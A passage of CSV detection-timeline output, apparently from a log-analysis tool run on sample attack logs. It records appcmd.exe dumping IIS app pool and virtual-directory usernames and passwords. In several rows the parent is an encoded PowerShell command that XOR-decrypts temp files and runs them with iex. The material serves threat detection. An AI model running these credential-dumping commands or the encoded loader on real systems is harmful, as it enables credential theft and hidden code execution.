UAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0